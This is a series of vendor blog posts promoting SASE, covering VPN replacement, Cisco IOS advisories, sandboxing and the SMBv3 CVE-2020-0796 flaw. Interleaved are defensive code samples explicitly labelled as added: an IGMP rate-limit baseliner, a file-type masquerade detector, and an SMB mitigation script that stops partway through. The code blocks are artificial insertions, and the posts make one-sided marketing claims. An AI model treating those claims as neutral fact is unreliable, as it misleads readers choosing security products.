Software-defined perimeter (SDP) also known as Zero Trust Network Access (ZTNA), is gaining traction as the new (and preferred) approach for granting secure access to the modern business. When offered as a cloud service, SDP eliminates the scalability limitations of VPN and enables immediate increase in remote access, without requiring additional hardware or software. SDP also offers enhanced security as it provides granular access control at the application level, as well as monitoring capabilities.
So, is the answer to question #2 a simple yes? Not exactly. SDP is a better option than VPN, however, SDP as a stand-alone solution doesn’t address the critical needs of continuous threat prevention and performance optimization.
Continuous threat prevention is vital as it protects the network from threats caused by remote users (whether knowingly or unknowingly). Performance optimization is essential for granting users accessing applications from anywhere, the same experience they’d get if they were physically in the office. Without these two key capabilities, replacing VPN with just SDP seems – for lack of a better word – pointless.
3. What does Gartner think?
Gartner considers SDP to be a core component of its new market category called Secure Access Service Edge (SASE). This ensures a unified, cloud-native approach, which is the main difference between a stand-alone SDP and SDP delivered as part of SASE.
According to Gartner’s Hype Cycle for Network Security, 2020, when SDP is integrated into a SASE platform, it presents a “flexible alternative to VPN” with significant benefits to the digital business including:
Advanced security: SASE’s integrated security stack inspects all traffic passing through to the network regardless of its source or destination.
Unlimited scalability: SASE’s cloud-native, distributed architecture supports any number of users, anywhere in the world.
Enhanced Performance: A true SASE platform includes a private backbone and WAN optimization, removing the need for the unreliable public Internet and guaranteeing best performance for all users and applications.
4. What’s the big difference?
The business impact of SDP built into SASE is clear and immediate. Agility, user experience, ease of adoption, granular application access, ongoing threat prevention, and simple policy management are just some of the benefits. Most of all, SDP with SASE supports digital transformation and business continuity by enabling all employees to work securely and effectively from remote locations.
5. Is there a happy ending?
The Motorola StarTAC was the first flip phone ever and was broadly adopted by consumers across the globe. Still, consumers managed to happily move on (several times) to newly introduced, more advanced, and more relevant phones. The same is true with access solutions. Business needs have changed, requiring full time access to enterprise assets, alongside granular security policies to protect these assets.
SDP with SASE is an agile, remote access solution that delivers instant and unlimited scalability, ease of adoption, enhanced security, and optimized performance to all users worldwide. SDP with SASE is the adaptable solution for enterprises determined to keep their business afloat during a global crisis, while ensuring support for both unexpected changes and planned growth initiatives moving forward. It’s really time to say goodbye to VPN – without regret.
The Newest Cisco Vulnerabilities Demonstrate All That’s Wrong with Today’s Patching Processes
Last month’s security advisories published by Cisco Security reveal several significant vulnerabilities in Cisco IOS and IOS XE software. Overall, there were 28 high impact and 13 medium impact vulnerabilities in these advisories, with a total of 46 new CVEs. All Cisco products running IOS were impacted, including IOS XR Software, NX-OS Software, and the RV160 VPN Router.
The sheer quantity of vulnerabilities should raise alarms but so should the severity. Based on my own analysis of two sets of advisories — Zone-based firewall feature vulnerabilities (CVE-2020-3421 and CVE-2020-3480 ) and DVMRP feature vulnerabilities (CVE-2020-3566 and CVE-2020-3569) — their impact will be very significant. Both advisories seriously leave enterprises exposed, in ways that never needed to or should have happened.
Figure 1 - Many vulnerabilities with High impact provided by the Cisco advisory center (partial list).
Zone-based firewall vulnerabilities expose networks to TCP attacks
The multiple vulnerabilities Cisco reported in the Zone-Based Firewall feature of IOS (CVE-2020-3421, CVE-2020-3480) leave enterprise networks open to simple L4 attacks.
More specifically, the Cisco advisory notes that these vulnerabilities could allow an unauthenticated, remote attacker to cause the device to reload or stop forwarding traffic through the firewall. Cisco reports that “The vulnerabilities are due to incomplete handling of Layer 4 packets through the device.” In such cases, the attacker could craft a sequence of traffic and cause a denial of service.
Organizations will need to patch affected devices as there are no workarounds. As Cisco explains in CVE-2020-342, “Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.”
However, patches themselves introduce risks. They involve OS-level changes, which in the rush to publish often contain their own bugs. Network administrators need time to test and stage the new patch. In the meantime, the devices remain open for a simple L4 attack that could potentially take down their networks.
Handling of DVMRP vulnerabilities raises serious questions.
Even worse was how Cisco handled the vulnerabilities in Cisco IOS XR’s Distance Vector Multicast Routing Protocol (DVMRP) implementation (CVE-2020-3566, CVE-2020-3569). Cisco originally published this Security Advisory on Aug 28, 2020, when Cisco’s response team became aware of exploits leveraging this vulnerability in the wild. But it took a month, yes, a month, before they provided some means for enterprises to address this threat.
According to the Cisco advisory, bugs in DVMRP “could allow an unauthenticated, remote attacker to either immediately crash the Internet Group Management Protocol (IGMP) process or make it consume available memory and eventually crash. The memory consumption may negatively impact other processes that are running on the device.”
In short, an attacker could craft IGMP traffic to degrade packet handling and other processes on the device. These vulnerabilities affect Cisco devices running any version of the IOS XR Software with multicast routing enabled on any of its interfaces. For a month, Cisco announced to the world that the door was wide open on any network running multicast.
To make matters worse, last month’s security advisory does little to lock that door. There are no patches to fix the vulnerability or even workarounds to temporarily address the problem. Instead, Cisco shared two possible mitigations, but both are limited.
One mitigation suggests rate limiting the IGMP protocol. Such an approach requires customers to first understand the normal rate of IGMP traffic, which would require network analysis of past data that if not done correctly could cause other issues, such as blocking legitimate traffic.
The second mitigation proposed adding an ACL that denies DVMRP traffic on a specific interface. This mitigation, though, only helps the interfaces that do not use DVMRP traffic, leaving other interfaces exposed.
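Cisco’s first mitigation only works if the limit sits above the interface’s normal IGMP peak, and the post’s warning is that a badly chosen limit blocks legitimate traffic. The following added example (not Cisco’s code or the original post’s) baselines per-interface IGMP packet counts from constructed sample history, derives a limit with headroom, and shows how a limit taken from too short a window clips the periodic membership-report bursts that legitimate multicast receivers generate; interface names and counts are made up.

```python
"""Baseline IGMP traffic before setting a rate limit.

Added example, not Cisco's code or the original post's. It derives a per-interface
IGMP rate limit from historical packet counts and reports which observed minutes a
candidate limit would have clipped, i.e. legitimate traffic a badly chosen limit
would block. All counts are constructed sample data; interface names are made up.
"""
from __future__ import annotations

import math
from dataclasses import dataclass

# Constructed: IGMP packets per minute on two interfaces over a 30-minute window.
# Hosts answer the querier's general query every couple of minutes, so an
# interface with many multicast receivers shows a report burst every few minutes.
SAMPLE_COUNTS: dict[str, list[int]] = {
    "Gi0/0/0/1-constructed": [12, 48, 11, 10, 52, 13, 9, 50, 12, 11,
                              47, 14, 12, 53, 10, 11, 49, 13, 12, 51,
                              10, 12, 48, 11, 13, 50, 12, 10, 52, 11],
    "Gi0/0/0/2-constructed": [2, 3, 2, 2, 4, 3, 2, 2, 3, 2,
                              2, 3, 2, 4, 2, 3, 2, 2, 3, 2,
                              3, 2, 2, 3, 2, 2, 4, 2, 3, 2],
}


@dataclass(frozen=True)
class Baseline:
    interface: str
    minutes: int        # length of history the limit was derived from
    median: float       # typical rate, packets per minute
    peak: int           # highest observed legitimate rate
    threshold: int      # suggested limit, packets per minute


def median_of(values: list[int]) -> float:
    ordered = sorted(values)
    mid = len(ordered) // 2
    if len(ordered) % 2:
        return float(ordered[mid])
    return (ordered[mid - 1] + ordered[mid]) / 2


def derive_threshold(counts: list[int], headroom: float = 2.0) -> int:
    """Limit = observed peak times a headroom factor, never below 1 packet/min.

    Using the peak (not the mean or median) is what keeps periodic report
    bursts, which are legitimate IGMP behaviour, under the limit.
    """
    if not counts:
        raise ValueError("no history to baseline from")
    return max(1, math.ceil(max(counts) * headroom))


def clipped_minutes(counts: list[int], threshold: int) -> list[int]:
    """Indexes of historical minutes whose legitimate rate exceeds the limit.

    A non-empty result means the candidate limit would have dropped real
    traffic at least once during the baseline window.
    """
    return [i for i, c in enumerate(counts) if c > threshold]


def baseline_interface(interface: str, counts: list[int],
                       headroom: float = 2.0, min_minutes: int = 20) -> Baseline:
    """Derive a limit only from a window long enough to contain the periodic bursts."""
    if len(counts) < min_minutes:
        raise ValueError(f"{interface}: need >= {min_minutes} minutes of history, "
                         f"got {len(counts)}")
    return Baseline(interface, len(counts), median_of(counts), max(counts),
                    derive_threshold(counts, headroom))


def audit(counts_by_interface: dict[str, list[int]],
          headroom: float = 2.0) -> dict[str, Baseline]:
    """Baseline every interface; the derived limit never clips its own history."""
    results: dict[str, Baseline] = {}
    for iface, counts in counts_by_interface.items():
        b = baseline_interface(iface, counts, headroom)
        if clipped_minutes(counts, b.threshold):
            raise AssertionError(f"{iface}: derived limit clips baseline history")
        results[iface] = b
    return results


def short_window_mistake(counts: list[int], window: int,
                         headroom: float = 2.0) -> tuple[int, list[int]]:
    """Derive a limit from only the first `window` minutes and show what it clips."""
    t = derive_threshold(counts[:window], headroom)
    return t, clipped_minutes(counts, t)


if __name__ == "__main__":
    for b in audit(SAMPLE_COUNTS).values():
        print(f"{b.interface}: median {b.median:.0f}/min, peak {b.peak}/min, "
              f"suggested limit {b.threshold}/min over {b.minutes} min of history")
    iface = "Gi0/0/0/1-constructed"
    limit, clipped = short_window_mistake(SAMPLE_COUNTS[iface], window=1)
    print(f"{iface}: a limit of {limit}/min from a 1-minute sample would have clipped "
          f"{len(clipped)} of {len(SAMPLE_COUNTS[iface])} minutes: {clipped}")
```

The per-minute figures are for baselining only; convert them to whatever unit the platform’s policer expects before configuring anything.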
Figure 2 – Cisco first published an advisory on Aug 28, leaving an open, zero-day vulnerability without a patch.
Enough with the pain of patching appliances
In both cases, enterprise networks were left seriously compromised by vulnerabilities in the very appliances meant to connect or protect them. And this is hardly the first time (check out this post for other examples).
Appliance vendors apologize and rush to provide assistance in the form of an update, but it’s enterprises who really bear the burden. Security and networking teams need to stop what they’re doing and work double-time to address vulnerabilities ultimately created by the vendors. It’s a pressurized, intense race to fix problems before attackers can exploit them.
At what point will appliance vendors stop penalizing IT and start solving the problems themselves? The sad answer — never.
The problem isn’t Cisco’s (or any other vendor’s) security group. It’s the nature of appliances. As long as vendors cling to aging appliance architectures, enterprises will suffer the pains of patching. Vendor security teams will invariably have to choose between alerting the public and providing corrective action.
The answer? Make the vendor responsible for your security infrastructure. If they’re not going to fix the problem – and stand behind it — then why should you be the one who has to pay for it? Cloud providers maintain the infrastructure for you, and so should appliance vendors. With cloud providers, there are no gaps between vulnerability notification and proactive action for attackers to exploit. If a vulnerability exists, cloud providers can patch the infrastructure under the hood and add mitigations transparently for all users everywhere — instantly.
That’s the power of the cloud and it’s particularly relevant as we start to look at SASE platforms. The advocacy for appliance-based SASE platforms will only continue to lead enterprises down this never-ending patch pain. Moving processing to the cloud resolves that pain for good. Anything else leaves enterprises suffering unprotected in this new age of networking and security.
Network Security is Not a Sports Car
I grabbed a beer with a close friend of mine the other night. He’s in his 30’s, recently married, and expecting his first little one. As we chatted about his new life, the matter of car buying came up. “My wife told me to go look at this SUV. I know it’s the right move and all, but there’s this hot, little Maserati...”
He didn’t need to finish. I knew what he was getting at. The Maserati, he confessed, made him feel young and free. He could go from 0 to 60 in less than 4 seconds, which we both agreed is great on paper but seldom used in city traffic. The SUV? It’s not quite as sleek and shiny but came with the latest car security features, perfect for his family’s future expansion.
“So, where’s the dilemma?” I asked him. He already answered his life-and-death question. “You’ve got to protect your family.”
“I know,” he said, “but I like having the fastest car I can afford, even if I never really drive that fast.”
Everybody Likes Sports Cars. Even IT Geeks
I wasn’t surprised. I can’t tell you how many times I’ve had similar conversations with IT professionals. The details might be different, but the story is the same. A network or security appliance has reached end-of-life, and a project is kicked off to find the latest and greatest replacement. A natural affinity for big brands with never-ending datasheets and feature lists immediately (and often subconsciously) takes hold. As we all know, “No one ever got fired for buying...” And so the team buys the Biggest, Baddest, Brand Appliance loaded with the newest features. Will they ever be used? Probably not. But just having them makes IT feel a bit better, like getting to 60 in less than 4 seconds.
The thing is, there is a penalty paid for that kind of speed. In my friend’s case, it’s the SUV’s security features he’ll be missing from his Maserati. In the case of IT, it’s the overhead that comes with appliances.
We’ve all seen how switching, routing, and, yes, even SD-WAN have rapidly approached commoditization as new vendors have jumped into the market. The core features, once so unique, have become commonplace. Differentiation increasingly becomes about price and highly specialized features that are only applicable to a handful of companies. Increasingly, the real value of a solution is less about specific capabilities and more about the operational overhead and agility of the solution. As Gartner puts it, “After decades of focusing on network performance and features, future network innovation will target operational simplicity, automation, reliability and flexible business models.”*
But regardless of the vendor, appliances as an architecture come with certain implicit limitations. There's a whole lifecycle that burdens IT with costs and complexity. Appliances need to be bought, deployed, maintained, upgraded, and retired. As patches are released, they need to be staged, tested, and deployed. It’s a complex, time-consuming operation that often necessitates disrupting network operations. And as traffic volumes grow or features are activated, the load on the appliance grows, forcing upgrades outside of budgetary cycles. What's more, appliances cover only a small part of the network, requiring additional solutions for the rest of the network and making overall visibility and control difficult.
Appliances are good for one thing – making money. So Big Brands built on appliances have a vested interest in perpetuating those architectures. They focus on their long lists of increasingly obscure features, many of which will never be used. But like the sex appeal of a Maserati, you only realize the mistake in buying into the Big Brand marketing when it’s too late – after the crash comes, or, in IT’s case, when the company needs to meet a key business requirement, such as mergers and acquisitions (M&A), cloud migration, and global expansion. Suddenly, the limitations of appliances become all too clear.
Take an M&A, for example. How are you going to get all of the acquired sites and your sites onto common security levels and enforced by the same policy? From a management perspective, how are you going to gain visibility into all security events?
With an NGFW appliance, your options are limited. One option is to align everyone on a single vendor: an enormous headache. Another is to keep the existing stack and buy additional products to orchestrate and monitor the multiple security products: more expense. A third involves a lot of integration work – manual effort that no one really has time for. Which pain would you prefer?
SUV: It’s All About Maturity, Responsibility...And Fun
The other approach is to forgo the sex appeal of the sports car, or in IT’s case the Big Brand appliance, and focus on solutions that really do meet today’s requirements for agility. Gartner terms these cloud-native services SASE (Secure Access Service Edge). They converge networking and security, moving the heavy processing of edge appliances into a global, cloud-native platform where it benefits from all of the elasticity, scalability, and affordability of the cloud.
True, cloud-native SASE services might not have the appeal of the Biggest Brands. They don’t necessarily have legions of features or claims of terabit performance.
What they do bring, however, is a global networking and security platform that empowers IT to be a business enabler and champion. By connecting and securing all enterprise edges – mobile users, remote users, branches, datacenters, cloud applications, and cloud datacenters – SASE is ready for any networking challenge the CIO might face. With all edges on one network, SASE provides the deep, enterprise-wide visibility that makes management and operations much simpler. And with the SASE provider running networking and security on a global, cloud-native platform, the service is highly scalable, easily upgradable, and always maintained by the provider.
In short, IT gains a platform, not just a product, and like the SUV it brings benefits to many areas at once. All of which makes meeting modern-day requirements simple.
Take that M&A, for example. There’s no need to deploy new appliances or even force a security change. Just have the acquired company connect their branch firewalls to the SASE cloud, and security is immediately unified, enforced, and monitored in a single place.
The same goes for other critical business challenges. Need to deploy five new pop-up stores per month? Good luck configuring, deploying and installing the necessary appliances. With SASE, you can make it 10 or even 100. Small stores can be first brought online instantly by establishing an IPsec tunnel from an existing firewall to the local SASE POP or by equipping the users with the SASE mobile client. Meanwhile, adding SASE’s self-configuring, edge SD-WAN device to the store is easy and gives the store not just SD-WAN, but security and cloud connectivity as well.
Today Is the Day of the SASE SUV
The day has arrived when someone will be fired for buying on brand alone. My friend’s wife couldn’t care a hoot how much he had a need-for-speed or that the car is named Maserati if it put her future children at risk or required them to buy yet another car to accommodate the stroller and car seat.
And the business won’t care about the logo on your router, edge SD-WAN, or NGFW appliance if you can’t be more efficient, agile, and enable the company’s success. If you can’t complete the logistics behind the M&A quickly or if you can’t enable the business to open those stores every month -- and do so with all the needed security and reliable cloud connectivity they require -- then it doesn’t matter if your HQ NGFW appliance comes from a Gartner MQ leader.
So, go enjoy that wonderful weekend with your family, take some time off from work, and don’t worry about the new ask waiting for you from the CEO. SASE has you covered.
* Gartner, 2019 Strategic Roadmap for Networking, Jonathan Forest, Neil Rickard, 10 April 2019
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
Sandboxing is Limited. Here’s Why and How to Best Stop Zero-Day Threats
Occasionally, prospective customers ask whether Cato offers sandboxing. It’s a good question, one that we’ve considered very carefully. As we looked at sandboxing, though, we felt that the technology wasn’t in line with the needs of today’s leaner, more agile enterprises. Instead, we took a different approach to prevent zero-day threats or unknown files containing threats.
What is Sandboxing?
Legacy anti-malware solutions rely mostly on signatures and known indicators of attack to detect threats, so they’re not always adept at catching zero-day or stealth attacks. Sandboxing was intended as a tool for detecting hidden threats in malicious code, file attachments and Web links after all those other mainstream methods had failed.
The idea is simple enough -- unknown files are collected and executed in the sandbox, a fully isolated simulation of the target host environment. The file's actions are analyzed to detect malicious behavior such as attempted communication with an external command and control (C&C) server, process injection, privilege escalation, registry alteration or anything else that could harm the actual production hosts. As the file executes, the sandbox runs multiple code evaluation processes and then sends the admin a report describing and rating the likelihood of a threat.
Sandboxing Takes Time and Expertise
As with all security tools, however, sandboxing has its drawbacks. In this case, those drawbacks limit its efficiency and effectiveness, particularly as a threat prevention solution. For one, the file analysis involved in sandboxing can take as much as five minutes -- far too long to hold a file while a business user waits for it in real time.
On the IT side, evaluating long, detailed sandboxing reports takes time, expertise, and resources. Security analysts need to have a good grasp of malware analysis and operating system details to understand the code’s behavior within the operating environment. They must also differentiate between legitimate and non-legitimate system calls to identify malicious behavior. Those are highly specialized skills that are missing in many enterprises.
As such, sandboxing is often more effective for detection and forensics than prevention. Sandboxes can be a great tool for analyzing malware after detection in order to devise a response and eradication strategy or prevent future attack. In fact, Cato’s security team uses sandboxes for that very purpose. But to prevent attacks, sandboxes take too long and impose too much complexity.
Sandboxes Don’t Always Work
The other problem with sandboxes is that they don’t always work. As the security industry develops new tools and strategies for detecting and preventing attacks, hackers come up with sophisticated ways to evade them and sandboxes are no exception. Sandbox evasion tactics include delaying malicious code execution; masking file type; and analyzing hardware, installed applications, patterns of mouse clicks and open and saved files to detect a sandbox environment. Malicious code will only execute once malware determines it is in a real user environment.
Sandboxes have also not been as effective against phishing as one might think. For example, a phishing e-mail may contain a simple PDF file that exhibits no malicious behavior when activated but contains a user link to a malicious sign-in form. Only when the user clicks the link will the attack be activated. Unfortunately, social engineering is one of the most popular strategies hackers use to gain network entry.
The result: sandboxing solutions have had to devise ever more sophisticated environments and techniques for detecting and defeating evasion, requiring more compute, hardware, staff and expense, and yielding a questionable cost/benefit ratio for many organizations.
The Cato Approach
The question then isn’t so much whether a solution offers sandboxing but whether a security platform can consistently prevent unknown attacks and zero-day threats in real-time. Cato developed an approach that meets those objectives without the complexity of sandboxing.
Known threats are detected by our anti-malware solution. It leverages full traffic visibility, including into encrypted traffic, to extract and analyze files at line rate. Cato determines the true file type not from the file extension (.pdf, .jpeg, etc.) but from the file contents, to defeat the common evasion tactic of executables masquerading as documents. The file is then validated against known malware signature databases maintained and updated by Cato.
The next layer, our advanced anti-malware solution, defends against unknown threats and zero-day attacks by leveraging SentinelOne’s machine-learning engine, which detects malicious files based on their structural attributes. Cato’s advanced anti-malware is particularly useful against polymorphic malware that is designed to evade signature-based inspection engines.
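The true-file-type check described above, as an added example that is not Cato's inspection engine: a file is classified by its leading bytes ("magic numbers") and flagged when the extension claims a different format. The signature table holds the well-known headers of each format; the sample files, including a PE header saved under a .pdf name, are constructed in a temp directory so the script runs offline.

```powershell
# Added example (not Cato's engine): classify files by content, not extension,
# and flag executables masquerading as documents. Sample files are constructed.

$Signatures = @(
    @{ Name = 'Windows PE executable'; Magic = [byte[]](0x4D, 0x5A);
       Extensions = @('.exe', '.dll', '.scr', '.sys') }   # "MZ" DOS stub; a stricter check also follows e_lfanew to "PE\0\0"
    @{ Name = 'PDF'; Magic = [byte[]](0x25, 0x50, 0x44, 0x46);
       Extensions = @('.pdf') }                           # "%PDF"
    @{ Name = 'ZIP container (OOXML, JAR)'; Magic = [byte[]](0x50, 0x4B, 0x03, 0x04);
       Extensions = @('.zip', '.docx', '.xlsx', '.pptx', '.jar') }
    @{ Name = 'OLE compound document (legacy Office, MSI)'; Magic = [byte[]](0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1);
       Extensions = @('.doc', '.xls', '.ppt', '.msi') }
    @{ Name = 'JPEG'; Magic = [byte[]](0xFF, 0xD8, 0xFF);
       Extensions = @('.jpg', '.jpeg') }
)

function Get-TrueFileType {
    param([Parameter(Mandatory)][string]$Path)
    # Read only the header; 16 bytes covers every signature in the table.
    $header = New-Object byte[] 16
    $stream = [System.IO.File]::OpenRead($Path)
    try     { $read = $stream.Read($header, 0, $header.Length) }
    finally { $stream.Dispose() }

    foreach ($sig in $Signatures) {
        $magic = $sig.Magic
        if ($read -lt $magic.Length) { continue }
        $match = $true
        for ($i = 0; $i -lt $magic.Length; $i++) {
            if ($header[$i] -ne $magic[$i]) { $match = $false; break }
        }
        if ($match) { return $sig }
    }
    return $null
}

function Test-FileMasquerade {
    param([Parameter(Mandatory)][string]$Path)
    $ext  = [System.IO.Path]::GetExtension($Path).ToLowerInvariant()
    $type = Get-TrueFileType -Path $Path
    $typeName   = 'unknown'
    $masquerade = $false
    if ($null -ne $type) {
        $typeName = $type.Name
        # Masquerade: the content is one format, the extension claims another.
        $masquerade = $type.Extensions -notcontains $ext
    }
    [pscustomobject]@{
        File       = [System.IO.Path]::GetFileName($Path)
        Extension  = $ext
        TrueType   = $typeName
        Masquerade = $masquerade
    }
}

# --- Constructed samples (headers only, no real malware) ---
$dir = Join-Path ([System.IO.Path]::GetTempPath()) 'truetype-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
[System.IO.File]::WriteAllBytes((Join-Path $dir 'report.pdf'),  [byte[]](0x25,0x50,0x44,0x46,0x2D,0x31,0x2E,0x37,0x0A))  # genuine PDF header
[System.IO.File]::WriteAllBytes((Join-Path $dir 'invoice.pdf'), [byte[]](0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00))       # PE header under a .pdf name
[System.IO.File]::WriteAllBytes((Join-Path $dir 'notes.docx'),  [byte[]](0x50,0x4B,0x03,0x04,0x14,0x00,0x06,0x00))       # OOXML (ZIP), consistent

Get-ChildItem -LiteralPath $dir -File |
    ForEach-Object { Test-FileMasquerade -Path $_.FullName } |
    Format-Table -AutoSize
```

Only the header is read, so the check costs the same for a 1 KB attachment and a 1 GB archive, which is what makes it viable at line rate. The table is deliberately short; a production classifier carries many more signatures and, for container formats like ZIP, inspects the entries inside as well.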
And Cato’s advanced anti-malware solution is fast. Instead of 1-5 minutes to analyze files, the advanced machine learning and AI tools from SentinelOne allow Cato to analyze, detect and block the most sophisticated zero-day and stealth attacks in as little as 50 to 100ms. This enables Cato advanced anti-malware to operate in real-time in prevention mode.
At the same time, Cato does not neglect detection and response. Endpoints can still become infected by other means. Cato identifies these threats by detecting patterns in the traffic flows across Cato’s private backbone. Every day, Cato captures the attributes of billions of network flows traversing Cato’s global private backbone in our cloud-scale, big data environment. This massive data warehouse provides rich context for analysis for Cato’s AI and anomaly detection algorithms to spot potentially harmful behaviors symptomatic of malware. Suspicious flows are reviewed, investigated and validated by Cato researchers to determine the presence of live threats on customer networks. A clear report is provided (and alerts generated) with Cato researchers available to assist in remediation.
Check out articles in Dark Reading here and here to see how Cato’s network threat hunting capability was able to detect previously unidentified malicious bot activity. Check out this Cato blog for more information on MDR and Cato’s AI capabilities.
Protection Without Disruption
Organizations need to prevent and detect zero-day threats and attacks in unknown files, but we feel that sandboxing’s speed and complexity are incompatible with today’s leaner, nimbler digital enterprises. Instead, we’ve developed a real-time approach that doesn’t require sophisticated expertise and is always current. But don’t take our word for it, ask for a demo of our security platform and see for yourself.
SASE and WAN Transformation – A Strategic Duo
Modern enterprises are going through challenging times. Increasing price competition, customer expectations for a seamless buying experience, instant delivery – altogether require a business that operates at optimal reliability and efficiency. At the same time, the business must be very agile to quickly adapt to market dynamics. Those business requirements are dependent on having a network and IT infrastructure that is just as agile and dynamic as the business itself.
Businesses must keep their momentum and expect IT to enable their progress. Whether it’s a merger with or acquisition of a competitor, a global expansion, or even the need to quickly open new offices, sites or stores – IT is expected to support it all in significantly shorter delivery times than ever before.
The past, the present, and the alternative future
IT teams have a long tradition of solving point problems with point solutions. It is a modus operandi fit for the old days, when there just wasn’t any good, unified alternative. Take global expansion as an example: the business is expanding to Europe. IT now needs to connect the new European branches to the company’s applications in the US with guaranteed performance and availability, and without compromising on security. This translates into multiple projects: negotiate MPLS contracts for global connectivity, deploy WAN optimization to improve overseas application performance, connect offices with local Internet breakout, and secure each office with UTMs or SWGs.
There is an alternative approach to such scenarios, and it is called a Secure Access Service Edge, or ‘SASE’ in short. A SASE platform converges all the network and network security capabilities, typically deployed as point products, into a unified and globally distributed cloud service. SASE eliminates the need to search, evaluate, procure, integrate and maintain multiple point products needed to keep the business going.
SASE not only addresses the current challenges IT teams face with the exhausting management of multiple point products, but it also addresses the uncertainties of the future. Provided as a cloud-native service, a SASE platform can adapt to new networking and security requirements, future-proofing the IT infrastructure that supports the digital business.
The future looks brighter with SASE
Let’s revisit the global expansion example from the perspective of an IT team that is already using a SASE platform. The need to connect the new European offices reliably to the applications located in the US is addressed by the SASE’s global private backbone, which provides an MPLS alternative. The SASE’s built-in WAN optimization capabilities ensure application performance is not degraded by the long-distance latency and limited bandwidth of overseas MPLS connections. Security is already in place and is enforced as soon as the new European sites are online and connected to the SASE cloud. What this means for IT is that all they need to do to support the expansion to Europe is subscribe to a local Internet service -- that’s it.
So let’s compare the old way with the new. In a pre-SASE world, a global expansion project requires the procurement of multiple services (MPLS, local Internet) and multiple products (WAN optimization, security, etc.), whereas in a SASE world the only requirements are one or two Internet circuits for each office. Being an all-in-one platform, SASE also eliminates the repetitive evaluation, procurement, and integration cycles of point products, significantly reducing overall project times.
SASE gets you ready for whatever’s next
IT's primary responsibility is enabling the business to pursue new opportunities. M&A, cloud migration, global expansion, mobility, and the rapid deployment of new locations all play out in almost every organization.
Traditionally, with each project you would have to choose the solutions to build the infrastructure to support it. It might be edge SD-WAN to overcome your MPLS limitations, a private global backbone to connect your remote branches, NGFWs, UTMs and SWGs to secure branches with direct Internet access, and access and optimization solutions for your clouds and mobile workforce.
The following table shows that, with a SASE platform, all of those IT infrastructure projects simply go away:
IT teams that lead and execute WAN transformation need to carefully choose the architecture that will support both the current and future needs of the business they serve. The power of a SASE platform as a future-proofing architecture is clear, as it is the only way IT teams can support the efficiency and agility requirements of modern, competitive businesses with an equally efficient and agile IT infrastructure.
Protect Your Systems Now from the Critical Windows SMBv3 RCE Vulnerability
At the beginning of the month, Microsoft released an advisory and security patch for a serious Windows Server Message Block (SMB) vulnerability called the Windows SMBv3 Client/Server Remote Code Execution Vulnerability (AKA Windows SMBv3 RCE or CVE-2020-0796). The Server Message Block (SMB) protocol is essential for Windows network file and print sharing. Left unpatched, this new SMB vulnerability has the potential to create a path for dangerous malware infection, which is why Microsoft has labeled it Critical.
Windows SMBv3 RCE isn’t the first vulnerability in SMB. In May 2017, the infamous WannaCry ransomware attack disabled more than 200,000 Windows systems in 150 countries using a different SMB vulnerability, the SMBv1 flaw patched in MS17-010 and exploited by EternalBlue. One of the hardest-hit victims, the British National Health Service (NHS), had to cancel more than 19,000 appointments and delay numerous surgeries. Microsoft had already issued a security patch, but WannaCry was able to infect thousands of unpatched systems anyway.
Cato urges every organization to apply the Microsoft patch for CVE-2020-0796 now across all relevant Windows systems, which we’ll discuss here. Cato has also updated its IPS to block any exploit of this new vulnerability. As long as customers have their Cato IPS in Block mode, their systems are protected. There’s no need to run IPS updates as you would with a security appliance or on-premises software. Thanks to Cato’s cloud-native architecture, the update is already deployed for all Cato customers.
How CVE-2020-0796 Works
Unlike WannaCry, which exploited a vulnerability in older versions of Windows, this new flaw lies in recent builds of Windows 10 and Windows Server. Specifically, the vulnerability is in the decompression routines of SMB version 3.1.1 (SMBv3) shipped with Windows 10 versions 1903 and 1909 (32- and 64-bit) and with Windows Server versions 1903 and 1909 (Server Core installations). Earlier Windows releases do not implement SMBv3 compression and were not listed as affected.
An attacker could exploit this vulnerability to execute code on either the SMB server or the SMB client side. They could attack a Windows SMB server directly, or induce an SMB client to connect to a malicious SMB server and compromise the client.
An attack using this vulnerability could play out in a few ways. An attacker could hit systems directly from outside the enterprise network if a system’s SMB port has been left exposed to the Internet; by default, however, Windows Firewall blocks unsolicited inbound connections to the SMB port on public networks. A more common scenario would involve a user inadvertently installing malware by clicking a malicious link in a phishing email. The malware would then exploit the SMBv3 vulnerability to spread to other Windows systems on the network without any further user interaction.
How to Protect Yourself
The best way to protect your organization from malware exploiting this critical vulnerability is to make sure all Windows 10 systems and any remote, contractor or other systems accessing the enterprise network have applied the Microsoft security patch. If you need to delay patching for any reason or can’t be sure every system is patched, there are other measures IT can take.
The easiest is to disable SMBv3 compression on the SMB server by setting the DisableCompression value under the LanmanServer Parameters registry key, which Microsoft states has no negative performance impact and requires no reboot. Microsoft describes how to do this in its advisory (see figure 1 below), and the change can be pushed to hundreds of systems via Group Policy. This workaround protects SMB servers but not SMB clients, which remain exposed to a malicious server until they are patched.
Figure 1: Microsoft Instructions for Disabling SMBv3 Compression
You could also block inbound TCP port 445 at the perimeter, but that only protects you from attacks originating outside the network, not from exploitation spreading internally, and the port is still needed inside the network for file sharing and other Windows components.
As for internal network flows, it’s always prudent to segment your network to restrict unnecessary traffic and keep attacks like these from spreading laterally. There is no reason, for example, that a client system in your finance department should have SMB access to systems in human resources; a workstation rarely needs to accept inbound SMB from anything at all.
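The three measures above (check patch state, apply the compression workaround, restrict port 445 at the host) as one added example. This is not Microsoft's or Cato's tooling: the registry path and DisableCompression value are the ones from Microsoft's advisory, the build numbers 18362 and 18363 are Windows 10/Server versions 1903 and 1909, and everything else (the function names, the -PatchKb input, the 'File and Printer Sharing' rule group, the example subnet) is an assumption for illustration. Run it in an elevated session; the KB number must be taken from Microsoft's advisory for the host's build.

```powershell
# Added example (not Microsoft's or Cato's tooling): assess and mitigate CVE-2020-0796
# on one host. Assumed inputs are marked; run elevated.

$SmbServerParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Smb3CompressionDisabled {
    # $true when the server-side workaround (DisableCompression = 1) is in place
    $p = Get-ItemProperty -Path $SmbServerParams -Name DisableCompression -ErrorAction SilentlyContinue
    return ($null -ne $p) -and ([int]$p.DisableCompression -eq 1)
}

function Disable-Smb3Compression {
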